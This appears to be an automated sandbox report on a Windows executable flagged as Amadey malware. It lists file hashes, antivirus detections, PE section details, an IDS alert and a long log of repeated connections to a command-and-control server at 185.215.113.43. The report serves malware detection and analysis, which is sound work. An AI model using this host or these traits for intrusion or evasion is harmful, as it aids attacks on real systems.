                                                        Process:C:\Users\user\Desktop\UyiH4t5dph.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):2990592
                                                        Entropy (8bit):6.57845694226229
                                                        Encrypted:false
                                                        SSDEEP:49152:l9PJuLnwLwJL6OBkiP4hpzl9h+q+GJNXu:l9PILnwLwJL6OBMRvdN
                                                        MD5:9D38889192A887E1128EC41DD417FB6D
                                                        SHA1:BF6B8A7C9EA4519EE2B4233375B9CF2CC9C7840B
                                                        SHA-256:B23ADB76C30005DC9D5391FD1F1218B36B6B0CB85B63F5CB9AEEB0CB01D77963
                                                        SHA-512:D4E8AEE2C1318E34537D0803F137282B5E9EC58B9A8113E38E8576F0808066F5A690149EA97F720D02642645E85EDEBA5C1DC482E6D730DA25CB99CAF604C8E3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                        Reputation:low
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................P1...........@...........................1.....&.....@.................................W...k.............................1.............................d.1..................................................... . ............................@....rsrc...............................@....idata ............................@...ascqmpzr..*.......*.................@...vkonyklc.....@1......z-.............@....taggant.0...P1.."....-.............@...........................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\UyiH4t5dph.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                        Process:C:\Users\user\Desktop\UyiH4t5dph.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):290
                                                        Entropy (8bit):3.4150827367778227
                                                        Encrypted:false
                                                        SSDEEP:6:NPMTX7L1UEZ+lX1CGdKUe6tkHs+Zgty0lnt0:NPMT7BQ1CGAFBZgtVnt0
                                                        MD5:5EFDB07BA77F151BE93EDCB751EECDE7
                                                        SHA1:083098E154ACC7D38595ADC0407A8F0BCDD28049
                                                        SHA-256:B7CA2F978C509079812F5FF1B1393DDA608A336C317F18DE1AF5B212444530C0
                                                        SHA-512:1CDC1D251D5B3A33D11BAD4DEC40F32DDCB555445C7D1840EBDF98FE6DD462448C44E6DBD79C886EB573870F1CC1FD1D65B0BA09028CF88877ED0C0FFCFC099F
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:....S..XY'.K.v......F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):6.57845694226229
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:UyiH4t5dph.exe
                                                        File size:2'990'592 bytes
                                                        MD5:9d38889192a887e1128ec41dd417fb6d
                                                        SHA1:bf6b8a7c9ea4519ee2b4233375b9cf2cc9c7840b
                                                        SHA256:b23adb76c30005dc9d5391fd1f1218b36b6b0cb85b63f5cb9aeeb0cb01d77963
                                                        SHA512:d4e8aee2c1318e34537d0803f137282b5e9ec58b9a8113e38e8576f0808066f5a690149ea97f720d02642645e85edeba5c1dc482e6d730da25cb99caf604c8e3
                                                        SSDEEP:49152:l9PJuLnwLwJL6OBkiP4hpzl9h+q+GJNXu:l9PILnwLwJL6OBMRvdN
                                                        TLSH:4BD53BA1750972CFD44E13789427DE827D6C03BA0F3448D3A89CA57ABE73CC52AB5D29
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                        Icon Hash:00928e8e8686b000
                                                        Entrypoint:0x715000
                                                        Entrypoint Section:.taggant
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:6
                                                        OS Version Minor:0
                                                        File Version Major:6
                                                        File Version Minor:0
                                                        Subsystem Version Major:6
                                                        Subsystem Version Minor:0
                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                        Instruction
                                                        jmp 00007FE6E8B89D0Ah
                                                        jo 00007FE6E8B89D33h
                                                        add byte ptr [eax], al
                                                        jmp 00007FE6E8B8BD05h
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+eax], ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add dword ptr [eax+00000000h], eax
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        push es
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax+0Ah], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        pop es
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add dword ptr [edx], ecx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        aas
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [edx], ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [ecx], al
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add dword ptr [edx], ecx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        xor byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        and al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add dword ptr [eax+00000000h], eax
                                                        add byte ptr [eax], al
                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x312eb40x10ascqmpzr
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x312e640x18ascqmpzr
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        0x10000x680000x2de00b28842b204425a24ab6bff6f7e0b7676False0.9980947717983651data7.980946742819636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x690000x5d40x400054288ea593c2b3e4a71e5821ee1d000False0.7041015625data5.830656249824963IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        ascqmpzr0x6b0000x2a90000x2a86002dce23e96640dcae8b40ecc565dc40d1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        vkonyklc0x3140000x10000x600bee338f2bbcd21a2f616d8c35523b572False0.5787760416666666data4.995079091612732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .taggant0x3150000x30000x22002db77f94a763f8964f0b6cff5a23e61dFalse0.07720588235294118DOS executable (COM)0.9625161653957387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_MANIFEST0x312ec40x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                        RT_MANIFEST0x3132a80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                        DLLImport
                                                        kernel32.dlllstrcpy
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-20T16:09:42.738579+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.849723185.215.113.4380TCP
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 20, 2024 16:09:04.640290022 CET4970980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:04.760550976 CET8049709185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:04.760637045 CET4970980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:04.761008978 CET4970980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:04.880637884 CET8049709185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:06.102077007 CET8049709185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:06.102184057 CET4970980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:07.604928970 CET4970980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:07.605328083 CET4971080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:07.724875927 CET8049710185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:07.724965096 CET4971080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:07.725120068 CET4971080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:07.725151062 CET8049709185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:07.725199938 CET4970980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:07.845377922 CET8049710185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:09.149262905 CET8049710185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:09.149421930 CET4971080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:10.776788950 CET4971080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:10.777120113 CET4971180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:10.896720886 CET8049711185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:10.896729946 CET8049710185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:10.896893978 CET4971080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:10.896907091 CET4971180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:10.897082090 CET4971180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:11.016670942 CET8049711185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:12.259918928 CET8049711185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:12.260154009 CET4971180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:13.761265039 CET4971180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:13.761744976 CET4971280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:13.881428003 CET8049712185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:13.881516933 CET8049711185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:13.881591082 CET4971280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:13.881612062 CET4971180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:13.881902933 CET4971280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:14.001868963 CET8049712185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:15.246069908 CET8049712185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:15.246253014 CET4971280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:16.872719049 CET4971280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:16.873055935 CET4971380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:16.992564917 CET8049713185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:16.992677927 CET4971380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:16.992872000 CET4971380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:16.994874954 CET8049712185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:16.994935989 CET4971280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:17.112514973 CET8049713185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:18.361529112 CET8049713185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:18.361685991 CET4971380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:19.870630026 CET4971380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:19.870980978 CET4971480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:19.990773916 CET8049714185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:19.990891933 CET4971480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:19.991131067 CET4971480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:19.991179943 CET8049713185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:19.991238117 CET4971380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:20.110707045 CET8049714185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:21.332242012 CET8049714185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:21.332303047 CET4971480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:22.964394093 CET4971480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:22.964715958 CET4971580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:23.084249973 CET8049715185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:23.084347963 CET4971580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:23.084517002 CET4971580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:23.084574938 CET8049714185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:23.084623098 CET4971480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:23.204297066 CET8049715185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:24.430284977 CET8049715185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:24.430416107 CET4971580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:25.933043003 CET4971580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:25.933367968 CET4971680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:26.052942991 CET8049716185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:26.053139925 CET4971680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:26.053607941 CET8049715185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:26.053617954 CET4971680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:26.053683996 CET4971580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:26.173297882 CET8049716185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:27.407341003 CET8049716185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:27.407484055 CET4971680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:29.028515100 CET4971680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:29.028841972 CET4971880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:29.148488998 CET8049718185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:29.148654938 CET4971880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:29.148720026 CET8049716185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:29.148796082 CET4971680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:29.148916960 CET4971880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:29.268551111 CET8049718185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:30.551928997 CET8049718185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:30.552012920 CET4971880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:32.058033943 CET4971880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:32.058382034 CET4972080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:32.178400040 CET8049720185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:32.178544998 CET4972080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:32.178672075 CET8049718185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:32.178751945 CET4971880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:32.178813934 CET4972080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:32.298630953 CET8049720185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:33.530127048 CET8049720185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:33.530198097 CET4972080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:35.174344063 CET4972080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:35.174618006 CET4972180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:35.294426918 CET8049721185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:35.294564009 CET4972180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:35.294627905 CET8049720185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:35.294687986 CET4972080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:35.294748068 CET4972180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:35.414403915 CET8049721185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:36.648319960 CET8049721185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:36.648401022 CET4972180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:38.151657104 CET4972180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:38.152015924 CET4972280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:38.271743059 CET8049722185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:38.271951914 CET4972280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:38.272156000 CET4972280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:38.272169113 CET8049721185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:38.272250891 CET4972180192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:38.391688108 CET8049722185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:39.651995897 CET8049722185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:39.652089119 CET4972280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:41.278737068 CET4972280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:41.279026985 CET4972380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:41.398598909 CET8049723185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:41.398729086 CET4972380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:41.398930073 CET4972380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:41.400504112 CET8049722185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:41.400553942 CET4972280192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:41.518757105 CET8049723185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:42.738420010 CET8049723185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:42.738579035 CET4972380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:44.246824980 CET4972380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:44.247143984 CET4972480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:44.367417097 CET8049724185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:44.367501020 CET4972480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:44.367697954 CET4972480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:44.367862940 CET8049723185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:44.367928982 CET4972380192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:44.488626003 CET8049724185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:45.725827932 CET8049724185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:45.725925922 CET4972480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:47.366301060 CET4972480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:47.366641998 CET4972580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:47.489135027 CET8049725185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:47.489234924 CET4972580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:47.491126060 CET4972580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:47.491743088 CET8049724185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:47.491923094 CET4972480192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:47.610701084 CET8049725185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:48.838783979 CET8049725185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:48.838897943 CET4972580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:50.356909037 CET4972580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:50.357264996 CET4972680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:50.476773024 CET8049726185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:50.476846933 CET4972680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:50.477078915 CET4972680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:50.479998112 CET8049725185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:50.480056047 CET4972580192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:50.596658945 CET8049726185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:51.827888966 CET8049726185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:51.828018904 CET4972680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:53.449798107 CET4972680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:53.450463057 CET4972780192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:53.570019960 CET8049726185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:53.570034981 CET8049727185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:53.570102930 CET4972680192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:53.570139885 CET4972780192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:53.570368052 CET4972780192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:53.690021038 CET8049727185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:54.920331955 CET8049727185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:54.920463085 CET4972780192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:56.433299065 CET4972780192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:56.433640003 CET4972880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:56.553807974 CET8049728185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:56.553858042 CET8049727185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:56.553926945 CET4972880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:56.553976059 CET4972780192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:56.554217100 CET4972880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:56.674045086 CET8049728185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:57.899444103 CET8049728185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:57.899585009 CET4972880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:59.528512955 CET4972880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:59.528803110 CET4972980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:59.649061918 CET8049729185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:59.649102926 CET8049728185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:09:59.649225950 CET4972980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:59.649246931 CET4972880192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:59.649506092 CET4972980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:09:59.770884991 CET8049729185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:01.005407095 CET8049729185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:01.005515099 CET4972980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:02.554481983 CET4972980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:02.558135033 CET4973080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:02.674833059 CET8049729185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:02.674906969 CET4972980192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:02.677810907 CET8049730185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:02.677896023 CET4973080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:02.678082943 CET4973080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:02.797699928 CET8049730185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:04.056854963 CET8049730185.215.113.43192.168.2.8
                                                        Dec 20, 2024 16:10:04.056910992 CET4973080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:05.686444998 CET4973080192.168.2.8185.215.113.43
                                                        Dec 20, 2024 16:10:05.686847925 CET4973180192.168.2.8185.215.113.43
